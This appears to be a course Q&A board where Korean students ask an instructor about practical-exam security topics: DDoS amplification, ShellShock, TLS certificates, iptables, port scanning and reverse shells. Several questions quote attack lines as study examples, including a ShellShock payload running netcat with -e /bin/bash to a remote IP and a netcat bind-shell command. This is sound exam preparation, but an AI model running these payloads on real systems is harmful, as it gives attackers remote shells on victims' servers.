[Q1] "NTP 분산 서비스 거부(DDoS) 취약점"과 "SSDP 분산 서비스 거부(DDoS) 취약점" 둘 다 내용을 보면 결국 "NTP 증폭 DRDoS 공격", "SSDP 증폭 DRDoS 공격"으로 보이는데 DDoS로 표현한 이유가 무엇일까요?ㅠㅠ 분산된 곳(여러 NTP/SSDP서버)에서 다수의 inbound되는 패킷이 발생하니 좀 좁게(?) 보면 DDoS(분산 서비스 거부) 공격이 맞다고도 보여지는데 큰 공격원리를 보면 결국 공격자의 Source IP스푸핑 -> 요청대비 큰 응답을 주는 NTP에 monlist, SSDP에 M-SEARCH 요청을 보냄으로써 byte가 큰 응답으로 '증폭'시켜서 희생자에게 '반사'시켜 응답되게끔 함 DRDoS 공격의 정의를 의미하고 있는데 시험에 만약 나오면 어떻게 적어야 할지 모르겠습니다 ㅠㅠ 만약 문제에 "지금 해당 트래픽이 어떤 상황을 의미하는지 쓰고, 그 원리와 대응책을 적어라"라고 했을 때 NTP 증폭 DRDoS 공격이라 적는게 맞을지 NTP 분산 서비스 거부(DDoS)라 적는게 맞을지 모르겠습니다. 까딱 잘못하면 키워드가 없다고 틀릴까봐 염려스러워서 질문드립니다.. ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ [Q2] 정보보호 개요에 나오는 부분인데요 필기 때 정리해둔 것과 구글링해서 찾아봤을 때 "위험=위협x취약점x자산" 이라고 나와있는데 실기 교재에는 "위험=위협x자산가치x취약성 or 위협성공가능성x위협 성공시 손실크기"라 나와있더라구요 정리해보면 "위험=위협x자산x취약점x위협 성공시 손실크기"인 것 같은데 "위협 성공시 손실크기"를 곱하는 게 맞나요? 곱하지 않는 게 맞나요? 문제에 위협 성공시 손실크기가 있으면 곱하면 되고 없으면 곱하지 않으면 되는 걸까요? 갑자기 새로운 항목을 곱하길래 찾아보다가 답이 명확히 서지 않아서 추가로 질문드려봅니다

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-04-08
답변완료

DNS 서버 보안 질문있습니다!

named.conf에서 version "unknown"으로 버전 정보를 지워버리면 slave는 어떻게 동기화를 하나요? ixfr 못쓰고 axfr만 써야하는 건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

조은혜 2022-04-06
답변완료

GNU bash 취약점 (ShellShock) 질문드립니다

전반적으로 이해는 되는데 교재 및 인강에 있는 내용을 글로 풀어서 써보려니 이게 맞을지 궁금하여 질문드리게 됐습니다. ------------------------------------------------------------------------------------------------------------------------------------------------------- 쉘에는 다양한 쉘이 존재하는데, 대표적으로 Linux의 bash쉘의 경우 ShellShock이라 불리는 Bash 취약점이 존재합니다. 해당 취약점은 쉘이 만약 동작하게 될 때 전역변수나 함수 등 전역적으로 사용되는 것들을 사용하기 위해 환경변수를 참조하는데요 이때 환경변수에 "함수"가 저장되어 있을 때("() {" 구문이 있을 때), 함수 선언문의 끝을 구분하지 못해서 ;(세미콜론)을 통한 추가적인 임의의 명령어가 존재할 시 해당 명령어까지 쭉~ 실행시키게 되는 취약점입니다. 이때 환경변수를 읽어들이는 대표적인 기술이 CGI입니다. 이 CGI는 요청헤더정보를 환경변수에 다 등록을 하고, Bash쉘 프로세스에게 전달하여 처리하게끔 하는데 이때 요청헤더정보에 "함수구문"이 존재하고, ShellShock 취약점이 존재하는 Bash쉘이 이를 처리한다면 위에서 말했던 취약점대로 추가적인 명령어까지 실행하게 됩니다. 따라서 이를 이용하여 추가적인 명령어에 악의적인 명령어를 넣음으로써 리버스쉘 연결, 악성코드 다운로드, 웹쉘 생성 등을 수행할 수 있게 됩니다. ------------------------------------------------------------------------------------------------------------------------------------------------------- 선생님, 제가 이해한 바가 맞을까요? 그리고 CGI에 대해서는 찾아보면 볼수록 너무 헷갈려서 단순히 "웹서버가 HTTP요청메시지를 응용프로그램(대표적으로 Bash쉘 프로세스)에게 전달하여 처리한 후, 처리결과를 Client에게 응답으로 내려주는 기술"이라고 숙지하려고 하는데 문제가 없을까요? -------------------------------------------------------------------------------------------------------------------------------------------------------- 그리고 함수구문 뒤에 추가하는 임의의 명령어 중에 () { :; }; /usr/bin/nc 10.10.10.10 80 -e /bin/bash 이렇게 적으면 사실상 쉘에서 nc 10.10.10.10 80 -e /bin/bash 명령어가 실행되는 거잖아요? 근데 악성코드쪽을 보면 () { :; }; /bin/bash -c "~~~~~~; ~~~~~~~~; ~~~~~~~; ~~~~" 이런 식으로 -c옵션을 통해서 문자열을 명령문으로 인식하고 실행시키도록 한다는데 () { :; }; /usr/bin/nc 10.10.10.10 80 -e /bin/bash 이거랑 무슨 차이가 있는지 궁금합니다. 여러 명령문을 넣을 때 그냥 ~~~~; ~~~~; ~~~~ 넣는 것보다 /bin/bash -c "~~~~"로 넣는 게 더 효율적이라 그런건가요?? 그냥 여러 형식으로 이렇게도 공격할 수 있다는 걸 보여주신 걸까요? 어차피 nc명령어나 wget 명령어나 bash쉘에서 동작하는 건 똑같지 않나요?? 굳이 자식쉘을 하나 더 만들면서 악성코드를 다운로드 한 이유가 궁금합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-04-06
답변완료

Xmas스캔 정의 문의드립니다

1. 실기 이론서 Xmas 스캔 정의에는 u p f플래그 설정으로 되어있는데, 개념은 이해되는데 필기 교재와 약간 다른거같아서 문의드립니다 2. 스텔스 범주도 필기(ack포함 등)와 약간 다른데, 실기기준으로 ack스캔빼고 syn 스캔포함하여 정리하면 될지도 문의드립니다 크게 중요해보이진않지만 조금 혼동이되어 문의드립니다 바쁘신데 미리 답변 감사드리며, 정말 좋은 강의와 에너지를 주셔서 진심으로 감사드립니다^^(합격하고 감사인사 다시드리고 싶네요ㅠ^^)

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이하정 2022-04-06
답변완료

프로세스 응용

프로세스 개요에 나오는 user area와 kernel area는 모두 메모리에 올라가는 커널 주소 공간(stack, data, code)에서 data영역에 올라가는거 맞나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이소율 2022-04-06
답변완료

선생님 SSL/TLS 완전 협상 복습 다시하는데 일전에 질문 답변 주신게 또 햇갈려서요.. ㅜ

선생님 가독성이 너무 안좋아서 메모장으로 글 올렸습니다 . 감사합니다 ㅜ 혹시 메모장도 안보일 경우.. 아래 질문도 같이 올려드립니다.. 1) CA(인증기관)으로부터 절차를 통해서 인증서를 최종적으로 발급받게되면 "공개키에 대한 인증서"와 그 쌍이 되는 "개인키"파일을 안전한 경로로 전달받게 됩니다. --> 여기서 공개키에 대한 인증서는 CA의 개인키로 서명한값이 있는 인증서가 되는 것으로 이해됩니다. 2) 인증서라는 것은 공개키에 대해서 인증기관(CA)이 서명한 전자문서입니다. 따라서 우리가 흔히 인증서라고 하면 그 인증서에는 공개키가 들어있고 그 공개키이 소유자, 발급자를 확인할 수 있는 정보가 포함되어 있습니다. - 인증서와 개인키는 웹서버에 설치가 됩니다. --> 여기서 말하는 인증서 안에 들어있는 공개키는 algisa.com 첨부의 그림파일처럼 RSA 공개키가 되는 걸까요?> 3) 인증서를 검증하는 첫단계는 올바른 인증기관에서 발급한 인증서인지를 검증하게됩니다. 따라서 인증서에 포함되어 있는 베리사인 전자서명을 검증하게 되는데 이를 검증하려면 베리사인 공개키가 필요하겠죠? 어디에 있을까요? 윈도우의 경우에는 윈도우 시스템내에 신뢰할 수 있는 최상위 인증기관 목록과 인증서를 관리하고 있습니다. --> 여기서 말하는 베리사인의 공캐키는 첨부파일의 Algisa.com 서버의 RSA 공개키가 아니며, 윈도우에서 관리 하는 Root CA 의 공개키가 된느 걸까요? 즉 정리하여 말씀드리면 첨부파일의 RSA algisa.com 웹서버의 공캐키와 질문드린 3)의 윈도우 내에 관리하고 있는 CA의 공개키는 다르다. 또한 단지 인증서가 올바른것인지 검증하기 위해 Server certificate 를 통해 인증서를 전달할시 윈도우에서 관리하는 RootCA의 공개키로 검증 한다 더불어, Client Key Exchange 과정에서 Premaster Secret 등을 Algisa웹서버의 RSA 공개키 (인증서내에 포함된 = 즉 본 게시글의 이미지 첨부파일) 암호화하여 서버 측으로 전달된다. 이게 제가 이해한게 맞을까요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-04-06
답변완료

Iptables

Iptables 교제 내 실습에서 Iptables -A INPUT -p tcp —syn —dport 80 과 같은 형태의 룰들이 많이 나오는데 출발지 ip 기준인지는 어떤 설정에서 정하는 것인가요?? INPUT 체인도 목적지 ip 기준 룰 작성할 수 있나요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-06
답변완료

dig 명령어 질문

강사님 안녕하세요. dig 명령어 중 옵션에 +norecurse 옵션에 대한 부분이 잘 이해되지 않아 질문 올립니다. 알기사 카페도 찾아본 결과 제 생각에는 norecurse 옵션을 주는 이유는 authoritative 서버가 recursive 질의를 하여 결과 반환하는 것이 아닌 iterative Query만을 이용하여 결과를 리턴하도록 설정하는 걸로 이해 했는데 맞는지 궁금합니다. 감사합니다!

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이은아 2022-04-05
답변완료

[44강] 4way handshake 실습 중 시퀀스 넘버 질문

[44강] 4way handshake 실습 중 시퀀스 넘버 질문 44강 48분쯤 와이어샤크로 4way handshake 패킷을 분석하는 부분에서 1. ack패킷(xp->fedora) 2. fin+ack패킷(fedora->xp) 3. ack패킷(xp->fedora) 4. fin+ack패킷(xp->fedora) 5. ack패킷(fedora->xp) 패킷흐름을 볼 수 있습니다. 궁금한점은 위 1번, 3번, 4번 패킷의 시퀀스넘버는 왜 증가하지 않는가? 입니다. 교재 181p의 3way handshake 할때는 1씩 증가하는것으로 설명을 보았고, p179의 시퀀스 넘버의 설명을 보면 송신시 전송하는 데이터의 바이트 단위로 부여하는 연속된 번호라고 들어 이해가 잘 가지 않습니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이우진 2022-04-05
답변완료

참고자료 질문

수업중에 참조되는 강의자료 및 핵심자료는 어디서 다운받을 수 있나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

유동현 2022-04-05
답변완료

크롬에서 강의를 듣기 위해 starplayer가 켜지는 순간, 자동으로 가상 머신이 shutdown 되어 실습을 못하고 있습니다..

크롬에서 강의를 듣기 위해 크롬 내부에서 스타 플레이어가 켜지는 순간, 미리 실습을 위해 켜 놓은 가상머신 (linux 가 설치되어 있는 virtual box 최신 버전-6 버전)가 자동으로 shutdown 되는 바람에.. 실습을 따라하지 못하고 있습니다... ㅠㅠ 인터넷 검색을 해보면, 버추얼 박스를 5.0.22 버전을 설치해서 해결할 수 있다고 적혀 있는데요.. 해당 버전을 설치 및 실행하려고 시도해 보아도, 윈도우 10 x64 (21H2) 환경에서 호환성 문제로 실행이 불가능하여, 실습을 따라하지 못하고 있습니다. 원래 강의를 듣는 PC에서, 동시에 가상머신을 켜서, 리눅스 실습이 불가능 한 건가요? 아니면 해결 방법이 있는 건가요? (현재 저희 집 환경은, 칼리 리눅스는 다른 노트북B 에 설치되어 있지만, 강의를 듣는 PC(노트북A)에서도 가상머신상에 리눅스(CentOS_7)를 켜서, 칼리 리눅스(노트북B)에 접속해보는 여러가지 테스트를 하고 싶습니다..)

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김석희 2022-04-05
답변완료

robots.txt

설정에서. 디렉터리 접근 설정할때 /디렉터리명/처럼 디렉터리명 양쪽으로 있어야되나요? 아니면 /디렉터리명 이렇게만 있어도 되나요?? 페이지마다 달라서 문의드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-04
답변완료

쿠키

쿠키 파일이 4kb 미만이여야 되거나 이런 문제는 이제 없나요?? 보안기사문제에서 4kb이상도 이제 저장된다고 봤던 거 같아서요

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-04
답변완료

TCP SYN Flooding 대응책 관련 문의

TCP SYN Flooding 대응책 중 SYN_Cookie가 있는데, 이 방법은 SYN_Cookie를 통해 사용자 확인이 될 때까지 백로그 큐를 사용안한다고 알고있습니다. 그러면 netstat -antp | grep 했을 때 서버 상태는 listen 인가요? SYN_RECV 인가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김정길 2022-04-03
답변완료

강의 자료 다운로드

수업중에 참조되는 강의자료 및 핵심자료는 어디서 다운받을 수 있나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

최준수 2022-04-03
답변완료

Snort SYN_FIN 플래그 조합 비정상 패킷 질문이 있습니다.

flags : SF 의 경우 연산자가 없을 경우 SYN,FIN만 설정된 경우를 말한다고 했는데 이 경우 SYN만 설정되어있어도 탐지가 되는건가요 ?아니면 두 플래그 모두 들어와야 탐지가 되는것인가요 ?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

최정안 2022-04-02
답변완료

개인적인 질문입니다

실무적으로 큰 도움이 된 강의같아요 감사합니다 지안 홈페이지에 교수님 다른 강의 찾아봤는데 이것 외에는 안보이던데 (칼리)리눅스나 자료구조론 프로그래밍 같은 다른 강의는 추후 서비스 하실 계획은 없으신지요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김현수 2022-04-02
답변완료

파일 업로드 취약점

파일업로드 취약점 프린트 자료 Content-type에서 MIME 타입이 application/x-www-form-urlencorede, multipart/form-data 그리고 text, image, application 타입 이렇게 나뉘던데 위쪽 content-type 헤더랑 아래 content-type헤더가 어떤 차이가 있나요? 위쪽 content-type 헤더에는 application/x-www-form-urlencorede, multipart/form-data 으로만 구분되고 아래쪽 boundary 구분자로 구분된 content-type헤더는 text, image, application 타입으로만 구분 되는 건가요?? 1. 즉 위쪽 content-type헤더에 구분자로 구분된 아래 content-type에서 쓰이는 mime type을 쓸 수 없는지 궁금합니다. 2. Text 타입은 mutipart 타입인가요 application/x-www-form-urlencorded 타입인가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-02
답변완료

Section 38 037.네트워크기본학습_07 p158~162_문의

안녕하세요. 좋은 강의 제공해주셔서 감사합니다. 해당 강의에서 GARP에 대해서 설명을 해주시는데, GARP 목적 중 하나로 IP 충돌 감지가 있습니다만, 네트워크 상에서 자신과 동일한 IP가 설정된 호스트가 있다면, 해당 호스트에 의해서 ARP Reply를 수신받아 IP 충돌 감지를 파악하는 것 같습니다만.. 상기의 상황이 일반적인 상황은 아닌건 지 문의드립니다. 동일 네트워크 상에서 동일 IP를 가질 수 있는 상황이 궁금합니다. NAT를 통해서 외부의 IP와 NAT 내부의 IP가 같을 순 있지만 (어차피 외부에서 바라봤을 땐, 공인IP처럼 보일 테지만) 네트워크상에서 동일 IP가 있는 상황이 있을 수 있는지 궁금합니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김동혁 2022-04-02
답변완료

Html tag 문의

안녕하세요 P373 과 p377의 html 특수문자에서 ‘(콜론)의 entity가 한쪽은 ' 이고 한쪽은 ' 인데 둘다 상관없나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-02
답변완료

포트 스캐닝 질문있습니다!

1. 닫힌 포트로 tcp SYN 패킷이 왔을때 RST+ACK으로 반응하는건 상대가 SYN_SENT로 기다리고 있을테니까 그걸 CLOSED로 바로 바꿔주기 위해서인 것 같은데, 굳이 이러는 이유는 TCP의 어떤 특성 때문인지? 신뢰성 때문이라면 무슨 제어를 위해서인지? 명확한 카테고리를 잘 모르겠습니다. 응답 안해주고 timeout되면 자동으로 closed 되게 해도 될 것 같은데, 시간적인 문제 때문일까요? 2. 어쨋든 -sF, -sX, -sN에 대해서는 닫힌 포트더라도 응답을 안하는게 보안상 더 좋아보이는데, 왜 표준을 수정하지 않는 것인지요?? 어차피 방화벽 같은걸로 방어하니까 딱히 수정할 필요없다고 보는건가요?? 3. 그리고 혹시 포트 스캐닝을 했을 때 상대방 쪽에 기록되는 시스템 로그는 뭔가요? var/log/messages??

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

조은혜 2022-04-02
답변완료

85강 84어플리케이션취약점

강의자료 업로드 해주실수있나요

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

박인희 2022-04-02
답변완료

10진수 난독화(인코딩)과 16진수 난독화(인코딩) 질문드립니다.

첨부된 10진수 인코딩과 16진수 인코딩에 대해서 궁금한 게 생겨서 질문드립니다. 제가 이해한 바로는, 난독화할 문자열을 아스키코드 10진수or16진수로 인코딩하여 난독화를 수행하는데 이때, 어찌됐든 난독화된 문자열을 Client쪽(브라우저)에서 다시 디코딩하여 악성script를 실행시켜야 하는데 그래서 다시 인코딩된 문자열을 디코딩해주는 함수가 10진수- String.fromCharCode()함수 16진수- unescape()함수 로 알고있습니다. 이때, 첨부된 10진수 인코딩 소스코드를 보면 eval()함수를 사용하는데 이 eval()함수를 사용하는 이유가, 디코딩된 문자열은 단순히 문자열 취급이 되기 때문에 이 문자열이 script코드로 동작되도록 eval()함수를 통해 script구문을 실행시켜주는 걸로 알고 있습니다. 그래서 10진수코드를 보면 xyz = eval("디코딩된 문자열");을 통해 iframe이 script구문으로 동작하도록 해주고 있는 걸로 판단됩니다. 이때 궁금한 점이 2가지가 있습니다 1. eval()함수를 통해 디코딩된 문자열을 script로 동작시킨 후, 해당 결과를 xyz변수에 저장한 다음 Client쪽에서 xyz가 실행되게끔 document.write() 하는 게 맞을까요? 2. 16진수를 보면 unescape()함수를 사용하여 디코딩 한 후 바로 document.write()함수를 통해 Client쪽에서 실행되게끔 하는데 eval()함수를 사용하지 않는 이유는 무엇인가요?? 제가 알기로는 unescape()함수도 단순히 디코딩을 해주는 함수로 알고 있어서 script구문이 동작하기 위해서는 eval()함수를 사용해야 하는거 아닌가 싶어서요 이 2가지가 너무 궁금해서 계속 찾아보는데 제가 생각한 게 맞는 거 같긴한데.. 확실히 알고 싶어서 질문드립니다. 감사합니다. [+] 아 그리고 침해사고 시나리오쪽 공부하면서 궁금한점이 있어요. 지금 공부하면서 개요부분이나 관련지식에서 중요한 부분을 체크하고(가령 DBD공격이 무엇인지, 웹쉘이 무엇인지, 루트킷이 무엇인지, 리버스쉘/바인드쉘이 무엇인지), '공격시나리오' 및 '분석시나리오'에서는 챙겨야 할 부분(lsof, 디페이스 공격이란?, 웹로그 삭제 명령어, wget명령어, echo redirection (>>)으로 cron파일에 저장하는 형식 등 포인트 부분만 짚어서 공부하고 있는 중입니다. 공격시나리오나 분석시나리오 자체를 외운다기 보다는 이해하려고 노력하려 하고, 중요할 거 같은 포인트만 따로 메모해두고 있는데요 시나리오 파트를 이렇게 공부해도 괜찮을까요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-04-01
답변완료

20강 finger 명령어

안녕하세요. 20강 finger 명령어가 utmp로그 파일, lastlog파일을 확인할 수 있는 명령어로 나와있는데, lastlog파일은 계정명을 붙여서만 확인할 수 있는지, 혹은 finger 명령어를 사용했을 때 logintime 으로 확인할 수 있기에 표기된 건지 헷갈려서 질문드립니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

신서영 2022-04-01
답변완료

62강 제한된 트래픽 흐름의 기밀성 보장에 대해 질문있습니다.

알기사 2022교재 p281의 맨 아래 그림은 ipsec 터널모드의 보호구간입니다. 설명과 같이 보면 터널/보안 게이트웨이 구간정보는 노출될 수 있다고 나와있는데, 그림에서는 게이트웨이 구간이 ipsec 보호 구간이라고 적혀있습니다. 이 부분이 이해가 안됩니다. 게이트웨이 구간정보가 노출되는데 ipsec 보호 구간이라고 할 수 있나요? ipsec 보호 구간이 말하는 것을 저는 트래픽 흐름의 기밀성을 보장한다 라고 생각하고 있는데 혹시 그게 아닌 다른 뜻이 있는건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

석인기 2022-04-01
답변완료

7강 24:35

find . -type f -user root \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 마지막에 ls -l {} 이후에 역슬래시랑 세미콜론도 필수인지 궁금합니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김승한 2022-03-31
답변완료

안녕하세요! 질문있습니다

2계층 주소는 서로 다른 네트워크로 라우팅 되지 않는다고 되어있는데(교재 p.160), 이 부분 이해가 안됩니다. 자세한 설명 부탁드립니다!

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

조은혜 2022-03-30
답변완료

directed broadcast관련하여 질문드립니다

일반적으로 Broadcast 패킷은 L3장비를 통과할수 없다고 알고있는데요 Smurf Attack을 보면 Directed broadcast패킷은 L3장비를 통과할수 있는거같은데 맞나요?? 목적지가 255.255.255.255인 패킷은 L3를 통과할수 없지만 192.168.10.255와같은 패킷은 L3장비에서 차단하는 설정이 있는게 아니라면 통과할수 있는게 맞는걸까요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-03-30
답변완료

GARP관련하여 질문드립니다

Land Attack관련해서 공부하다가 GARP와 해깔리는 부분이있어 질문드립니다 Land Attack이라는게 Src IP와 Dst IP가 모두 Target Host의 IP로 설정된 공격이고 해당패킷을 받으면 자기자신에게 다시 응답을 보내는 공격으로 DoS공격이라고 이해했습니다 현재는 Src IP와 Dst IP가 동일한 패킷이 들어올경우 해당 패킷을 Drop시켜서 현재는 통하지 않는 공격이라고 이해했구요 그런데 GARP로 네트워크내에 자신과 동일한IP를 사용하는 Host가 있는지 탐지한다고 설명해주셨던게 기억이납니다 이때도 Src IP와 Dst IP가 동일한패킷을 만들어 브로드캐스트로 전송해서 탐지하는 방식이라고 이해했는데요 GARP패킷에 대해서는 OS단에서 Drop하지 않는건가요?? Src IP와 Dst IP가 동일한 패킷은 Drop하지만 GARP패킷은 예외적으로 Drop하지 않는다고 이해하면 될까요?? 그리고 추가적으로 이해가 안가는 부분이있습니다 예를들어 192.168.10.10이라는 IP에 대해서 GARP로 동일한IP를 사용하는 단말이 있는지 확인하려고 GARP를 브로드캐스트로 전송했을때 만약 192.168.10.10을 사용하는 단말이있고 해당 패킷을받아 응답하려고 할때요 Src IP : 192.168.10.10이고 Dst IP : 192.168.10.10패킷에 대해서 응답패킷은 Src IP : 192.168.10.10이고 Dst IP ; 192.168.10.10이 될텐데 이걸 그냥 수신패킷의 Src MAC을 Dst MAC으로 설정해서 응답하는건가요?? 개행을 했는데도 질문에는 개행이 안되게 올라가네요... 좀 질문이 난잡하게 보이는데 설명좀 부탁드릴께요ㅠ

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-03-30
답변완료

P314 dns

이론서 dns 네임서버 질의.응답 패킷분석 2 응답 데이터가 512바이트 초고ㅓ일 경우 tcp 포트 사용 와이어샤크 캡쳐가 떠있는데 응답데이터를 처음보냈을 때 udp로 TC를 설정한 패킷과 재전송한 응답 tcp 패킷의 길이가 왜 달라지나요? 레코드 타입도 같은데

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-03-30
답변완료

앗.. 질문할 것이 하나 더 생겨서 답변안달렸으면 수정하려 했는데 답변이 달렸네요 죄송합니다 하나만 더 질문할게요..

죄송합니다 강사님 갑자기 헷갈리는 부분이 생겨서 지금까지 찾아보다가 아직도 아리쏭해서 아까 질문글 올렸던 거를 수정해서 질문하려 했는데 이미 답변이 달려있어서 다시 질문글을 작성하게 됐습니다.ㅠㅠ 같은 리버스쉘 시나리오 단원입니다. 크게 중요한 부분은 아닌 것 같지만 그래도 이게 괜히 찝찝해서 질문드려요 리버스쉘 시나리오 개요부분을 보면 "웹서버의 루트(root) 계정을 탈취하기 위해"라 되어있는데 해당 계정을 탈취해서 uid, gid 0인 일반사용자를 만들기까지 하니 시스템(os) root계정이라 생각이 드는데 제가 갑자기 알고있던 지식이 충돌해서 여기서 아리쏭한점이 생겨버렸네요 DB같은 경우 DB의 root와 시스템에 있는 root가 다른 걸로 알고있습니다. 그래서 어플리케이션 root계정 ≠ 시스템 root 계정으로 기본적으로 이해하고 있었는데 여기서 웹서버의 root계정을 탈취한다는 것은 문맥적으로 보면 시스템OS인 것은 확실한데 웹서버는 기본적으로 최소한의 권한을 가진 사용자가 실행되게끔 하기 위해 서비스프로세스를 apache 계정 및 그룹을 만들어서 실행시키는 걸로 알고 있어요. 대신 80번포트는 privileged port라 관리자(root)만이 실행할 수 있다고 알고 있습니다. 그래서 이때 웹서버의 root계정을 탈취한다는 의미가, privileged port(80) 웹서버를 실행시킨 계정이 root으로 이해가 됩니다. 그래서 개인적으로 이해한 부분이 웹서버의 root계정을 탈취 => 웹서버를 통해 시스템 root 계정을 탈취 이렇게 풀어서 이해하게 되는데 맞을까요? 이게 괜히 자꾸 "웹서버의 root"이 문맥에 사로잡혀서 자꾸 머릿속에 맴돌아서 죽겠습니다 ..ㅠㅠ

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-30
답변완료

리버스쉘 침해사고 중에 궁금한 거 하나 질문드립니다

일반적으로 바인드쉘 방식인 telnet, ssh 등 원격터미널 접속을 방화벽에서 차단하므로 리버스쉘 방식을 통해서 서버쪽이 Client(공격자)쪽으로 요청하여 연결되게 한 다음 exec를 통해 실행이미지를 /bin/bash(bash환경)터미널로 변경함으로써 /bin/bash쉘이 실행되게끔 하잖아요? 여기서 궁금한 점이 생겼습니다 공격자가 어차피 내부적으로 root권한을 탈취해서 해당 공격이 가능한 것이잖아요? 그래서 반대로 리버스쉘 방식이 아닌 바인드쉘 방식으로 아래처럼 공격하는 기법도 가능한지 궁금합니다. 제가 전체적인 흐름과 동작방식을 이해했을 땐 충분히 아래 방식대로도 공격할 수 있을 거라 생각이 들어서 질문드려요 만약 방화벽 정책이 화이트리스트 정책이 아니라 블랙리스트 정책이여서 ssh, telnet 포트만 차단하고 있다고 가정하면 공격자가 타겟 서버쪽에 nc -lvp 1234 -e /bin/bash 명령어를 통해 특정 포트를 열고 있고, 연결될 시 실행이미지를 /bin/bash로 변경시키는 nc프로세스를 띄웠다고 가정하면 공격자는 단순히 nc [타겟서버ip/도메인] 1234 이렇게 해당 타겟서버의 nc프로세스 포트와 연결함으로써 쉘을 획득할 수도 있을까요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-03-29
답변완료

wireshark와 4way_handshaking 관련 문의

안녕하세요 선생님 교재 실기책 최신판 184페이지 강의 보다가 질문생겼습니다. 4way handshaking 에서 캡처된 화면인데요 책 삽화그림하고 저기 캡처한 강의 하고 비교해볼대 갠적으로 좀 혼동됩니다. dst_address, port_num rst_address, port_num 이거 방향이 혼동됩니다. 교재에 그림하고 이미지캡처그림하고 반대로 된것 같기도 하고, 더군다나 연결 접속방향은 윈도우즈(randomiz port)가 리눅스(23port)로 텔넷연결이 됬는데 제가 봤을땐 반대로 연결된걸로 보입니다. 어느게 맞는건가요 제가 아직 잘 몰라서요...^^; 확인좀 부탁드립니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

명두희 2022-03-29
답변완료

입출력 재지정

안녕하세요, 강의 듣다가 궁금한 점이 생겨 질문 남깁니다. [Section 4 003.UNIX/Linux기본학습_02 p30~31] 강의 중 'nohup ./batch.sh 1> /dev/null 2>&1' 명령어 실행을 예시로 들어주셨는데요. 표준출력을 /dev/null로 보내고, 그 뒤에 표준 에러를 다시 표준출력으로 보낸다고하면, 표준에러는 앞서 지정한 것과 같이 /dev/null로 가게 되나요, 아니면 그대로 화면에 출력이 되나요? 답변 주시면 감사하겠습니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김소연 2022-03-29
답변완료

RUID, EUID관련 질문드립니다

안녕하세요 강사님 강의 잘듣고있습니다 감사합니다 강의중 궁금한점이 있어 질문드립니다 버퍼오버플로우쪽 실습에서 setreuid와 setregid함수를 사용해서 ruid와 euid를 변경하여 쉘을 실행하는걸 보여주셨는데요 기존에 설명해주실때 파일내에서 자원에 접근할때는 euid를 사용하고 새로운 파일을 실행시킬때는 ruid를 사용한다고 설명해주셨던걸로 기억합니다 위의 실습에서 보여주신것과같이 프로그램내에서 함수를 사용할때는 euid를 사용하는건가요?? buf_over.c프로그램에 set UID를 설정해서 함수를 실행시킬때는 root의 권한으로 실행시켰다고 이해했는데 맞을까요?? 그리고 쉘을 실행시킬때는 ruid를 사용하는건가요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-03-29
답변완료

HTTP GET Flooding 대처 방법 질문드립니다.

선생님 안녕하세요 HTTP GET Flooding 에 대한 대처방법이 책에 명시 되어있지 않아 KISA 디도스_공격_대응_가이드_최종본 을 보고 질문 드립니다. 이미지에 나온것처럼 클라이언트 요청에 쿠키값을 추가하여 응답을 보낸 후 , 보낸 쿠키값을 포함하지 않은 응답은 비정상 사용자로 판단하여 차단 이라고되어있는데.. 이게 무슨뜻인지 모르겠습니다. 그러니까 웹서버에서 Set-Cookie : 정상사용자 등의 Set-Cookie 를 하면 , 클라이언트 -> 웹서버로 요청시 Cookie : 정상사용자 로 요청 하는 것을 검사 한다는 의미일까요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

강현중 2022-03-28
답변완료

Syn flooding

Syn flooding 대응책에서 동일 출발지 ip로 동시연결개수 5회 초과 시 차단이라고 나와있는데 공격자는 랜덤ip를 출발지로 flooding을 수행하는데 왜 이 방법이 대응되나요? 제가 잘못이해하고있다면 설명부탁드립니다. Iptables -A INPUT -p TCP —dport 80 —syn -m connlimit —connlimit-above 5 -j DROP

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-03-28
답변완료

강의 시청 문의드립니다

